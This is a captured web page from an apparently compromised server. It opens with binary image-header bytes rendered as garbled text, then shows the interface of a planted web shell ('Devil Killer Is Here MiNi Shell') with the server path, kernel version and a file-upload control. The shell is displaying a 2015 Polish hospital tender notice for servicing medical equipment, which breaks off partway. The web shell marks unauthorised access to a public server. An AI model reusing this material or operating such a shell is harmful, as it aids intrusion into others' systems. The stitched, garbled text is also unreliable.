JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150917/243018-N-2015.html

<p class="kh_header"><b>Wałbrzych: Świadczenie usług serwisowych aparatury i sprzętu medycznego będącego na wyposażeniu Specjalistycznego  Szpitala  im.  dra Alfreda Sokołowskiego w  Wałbrzychu .</b><br>
<b>Numer ogłoszenia: 243018 - 2015; data zamieszczenia: 17.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Szpital im. dr Alfreda Sokołowskiego , ul. Sokołowskiego 4, 58-309 Wałbrzych, woj. dolnośląskie, tel. 074 6489742, faks 074 6489746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdrowie.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług serwisowych aparatury i sprzętu medycznego będącego na wyposażeniu Specjalistycznego  Szpitala  im.  dra Alfreda Sokołowskiego w  Wałbrzychu ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług serwisowych aparatury i sprzętu medycznego będącego na wyposażeniu Specjalistycznego  Szpitala  im.  dra Alfreda Sokołowskiego w  Wałbrzychu .

Pakiet nr 1  -  Sprzęt medyczny - diagnostyczny.
Pakiet nr 2  -  Sprzęt medyczny - ratujący życie.
Pakiet nr 3  -  Sprzęt medyczny  - ratujący życie, nadzorująco-monitorujący i pomocniczy .
Pakiet nr 4  -  Sprzęt medyczny - nadzorująco-monitorujący.
Pakiet nr 5  -  Sprzęt medyczny  - ratujący życie.
Pakiet nr 6  -  Sprzęt medyczny -  okulistyczny.
Pakiet nr 7  -  Sprzęt medyczny -  okulistyczny.
Pakiet nr 8  -  Sprzęt medyczny  -  rehabilitacyjny.
Pakiet nr 9  -  Sprzęt medyczny -  dializacyjny i pomocniczy.
Pakiet nr 10 - Sprzęt medyczny  - okulistyczny.
Pakiet nr 11 - Sprzęt medyczny  - ratujący życie.
Pakiet nr 12 - Sprzęt medyczny  - metrologiczny.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium wymagana do wzięcia udziału w postępowaniu: 
Pakiet nr 1  -    370,00 zł.
Pakiet nr 2  -    496,00 zł.
Pakiet nr 3  -    413,00 zł.
Pakiet nr 4  - 2 727,00 zł .
Pakiet nr 5  - 140,00 zł .
Pakiet nr 6  - 100,00 zł.
Pakiet nr 7  - 152,00 zł .
Pakiet nr 8  - 193,00 zł.
Pakiet nr 9  - 332,00 zł.
Pakiet nr 10 -  36,00 zł.
Pakiet nr 11 - 282,00 zł.
Pakiet nr 12 - 564,00 zł.

 DATĄ UZNANIA WPŁATY  BĘDZIE DATA WPŁYWU NA KONTO ZAMAWIAJĄCEGO.

Potwierdzenie wniesienia wadium należy dołączyć do oferty. Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego do oferty przetargowej oświadczenia oraz wymaganych dokumentów tj. 
1) posiadanie aktualnego odpisu z właściwego rejestru - na podstawie załączonego aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia  w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;
2) posiadanie aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego że Wykonawca nie zalega z uiszczaniem podatków - na podstawie aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3) posiadanie aktualnego zaświadczenia właściwego oddziału ZUS lub KRUS potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne - na podstawie aktualnego zaświadczenia właściwego oddziału ZUS lub KRUS potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego do oferty przetargowej oświadczenia oraz wymaganych dokumentów tj. :
- posiadanie doświadczenia w zakresie świadczenia usług będących przedmiotem zamówienia - na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego do oferty przetargowej oświadczenia oraz wymaganych dokumentów tj. :
-zatrudnienie pracowników posiadających wymagane uprawnienia do wykonywania przedmiotowego zamówienia - na podstawie oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wykonwywanie czynności przeglądów technicznych, konserwacji oraz napraw aparatury i sprzętu medycznego), posiadają wymagane uprawnienia zgodnie z Ustawą  z dnia 20 maja 2010 r. o wyrobach medycznych, Dz. U. Nr 107 poz. 679.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego do oferty przetargowej oświadczenia oraz wymaganych dokumentów tj. :
- posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia - na podstawie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony wzór oferty- załącznik  nr 2 do SIWZ
Dowód wniesienia lub ustanowienia wadium 
Tabela < Podwykonawcy > - załącznik nr 5 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Narzut na części (materiały) - 10</li>
<li>3 - Gwarancja na wymienione części (materiały) - 10</li>
<li>4 - Gwarancja na wykonanie usługi - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdrowie.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, ul. Sokołowskiego 4, 58-309 Wałbrzych - Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2015 godzina 10:00, miejsce: Siedziba Zamawiającego, ul. Sokołowskiego 4, 58-309 Wałbrzych - Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzęt medyczny - diagnostyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz sprzętu diagnostycznego 		
L.p.	Nazwa urządzenia	Typ
1.	Aparat EKG	ASCARD B-1
2.	Aparat EKG	ASCARD B3
3.	Aparat EKG	ASCARD B3
4.	Aparat EKG	ASCARD B3
5.	Aparat EKG	ASCARD B3
6.	Aparat EKG	ASCARD B-5
7.	Aparat EKG	ASCARD B56
8.	Aparat EKG	ASCARD B56
9.	Aparat EKG	ASCARD B56
10.	Aparat EKG	AsCard Mr. Red
11.	Aparat EKG	AsCARD Mr.BLUE
12.	Aparat EKG	AsCARD Mr.BLUE
13.	Aparat EKG	AsCARD Mr.BLUE
14.	Aparat EKG	AsCARD Mr.BLUE
15.	Aparat EKG	AsCARD Mr.BLUE
16.	Aparat EKG	ASCARD Mr.Green
17.	Aparat EKG	ASCARD Mr.Green
18.	Aparat EKG	AsCARD MrGrey
19.	Aparat EKG	BTL - 08 MT Plus
20.	Aparat EKG	E600
21.	Aparat EKG	ECG-1250
22.	Aparat EKG	ECG-1250
23.	Aparat EKG	MIDI CARD
24.	Aparat EKG	MIDI CARD
25.	Aparat EKG	Mr RED
26.	Aparat EKG	Mr Silver
27.	Aparat EKG	M-TRACE
28.	Aparat EKG	M-TRACE
29.	Aparat EKG	M-TRACE
30.	Aparat EKG	M-TRACE
31.	Aparat EKG	M-TRACE
32.	Aparat EKG	M-TRACE
33.	Aparat EKG	M-TRACE
34.	Aparat EKG	M-TRACE
35.	Aparat EKG	M-TRACE
36.	Aparat EKG	M-TRACE
37.	Aparat EKG	Multicard E-30
38.	Aparat EKG	SE 1200   
39.	Aparat EKG	SE 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzęt medyczny - ratujący życie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1.	Defibrylator	CARDIO AID 200
2.	Defibrylator	CARDIO AID 200
3.	Defibrylator	CARDIO AID 200
4.	Defibrylator	CARDIO AID 200
5.	Defibrylator	CARDIO AID 200
6.	Defibrylator	CARDIO AID 200
7.	Defibrylator	CARDIO AID 200
8.	Defibrylator	CARDIO AID 200
9.	Defibrylator	CARDIO AID 200
10.	Defibrylator	CARDIO AID 200
11.	Defibrylator	CARDIO AID DMS 730
12.	Defibrylator	Cardio-AID
13.	Defibrylator	Cardio-AID MC+
14.	Defibrylator	Cardio-AID MC+
15.	Defibrylator	CARDIO-AID100
16.	Defibrylator	CARDIOSERW.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzęt medyczny  - ratujący życie, nadzorująco-monitorujący i pomocniczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1.	Inkubator   	GIRAFFE - inkubator otwarty
2.	Inkubator   	GIRAFFE - inkubator otwarty
3.	Inkubator   	IWS 3400
4.	Inkubator   	IWS 3400
5.	Kardiomonitor	DASH 4000
6.	Lampa do fototerapii	LULLABY PT
7.	Lampa do fototerapii	LULLABY PT
8.	Lampa do fototerapii	LULLABY PT
9.	Lampa do fototerapii	LULLABY PT
10.	Materacyk do fototerapii	BILIBLANKET 
11.	Materacyk do fototerapii	BILIBLANKET 
12.	Monitor	CAM F-CM1-05
13.	Monitor	CAM F-CM1-05
14.	Monitor	CAM F-CM1-05
15.	Monitor DATEX	D-LCC 1503
16.	Monitor DATEX	D-VNC 15-00-03
17.	Monitor parametrów rzutu serca	PICCO 2
18.	Monitor parametrów rzutu serca	PICCO 2
19.	Monitor pomiaru ciśnienia wewnątrzczaszkowego	Camino 
20.	Monitor pomiaru ciśnienia wewnątrzczaszkowego	Camino 
21.	Monitor pomiaru ciśnienia wewnątrzczaszkowego	Camino 
22.	Pompa infuzyjna	PLUM A+ objętościowa
23.	Pompa infuzyjna	PLUM A+ objętościowa
24.	Pompa infuzyjna	PLUM A+ objętościowa
25.	Pompa infuzyjna	PLUM A+ objętościowa
26.	Pompa infuzyjna	SP-12-SPRO-N (1 strzykawkowa)
27.	Pompa infuzyjna	SP-12-SPRO-N (1 strzykawkowa)
28.	Pompa infuzyjna	SP-12-SPRO-N (1 strzykawkowa)
29.	Pompa infuzyjna	SP-12-SPRO-N (1 strzykawkowa).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sprzęt medyczny - nadzorująco-monitorujący.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa urządzenia	Typ
1.	Monitor funkcji życiowych	BSM-650 1 K
2.	Monitor funkcji życiowych	BSM-670 1 K
3.	Monitor funkcji życiowych	BSM-670 1 K
4.	Monitor funkcji życiowych	BSM-670 1 K
5.	Monitor funkcji życiowych	BSM-670 1 K
6.	Monitor funkcji życiowych	BSM-670 1 K
7.	Monitor funkcji życiowych	BSM-670 1 K
8.	Monitor funkcji życiowych	BSM-670 1 K
9.	Monitor funkcji życiowych	BSM-670 1 K
10.	Monitor funkcji życiowych	BSM-670 1 K
11.	Monitor funkcji życiowych	CNS-970 1 K - Stacja centralnego monitorowania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Narzut na części (materiały) - 10</li>
<li>3. Gwarancja na wymienione części (materiały) - 10</li>
<li>4. Gwarancja na wykonanie usługi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sprzęt medyczny  - ratujący życie.</p>
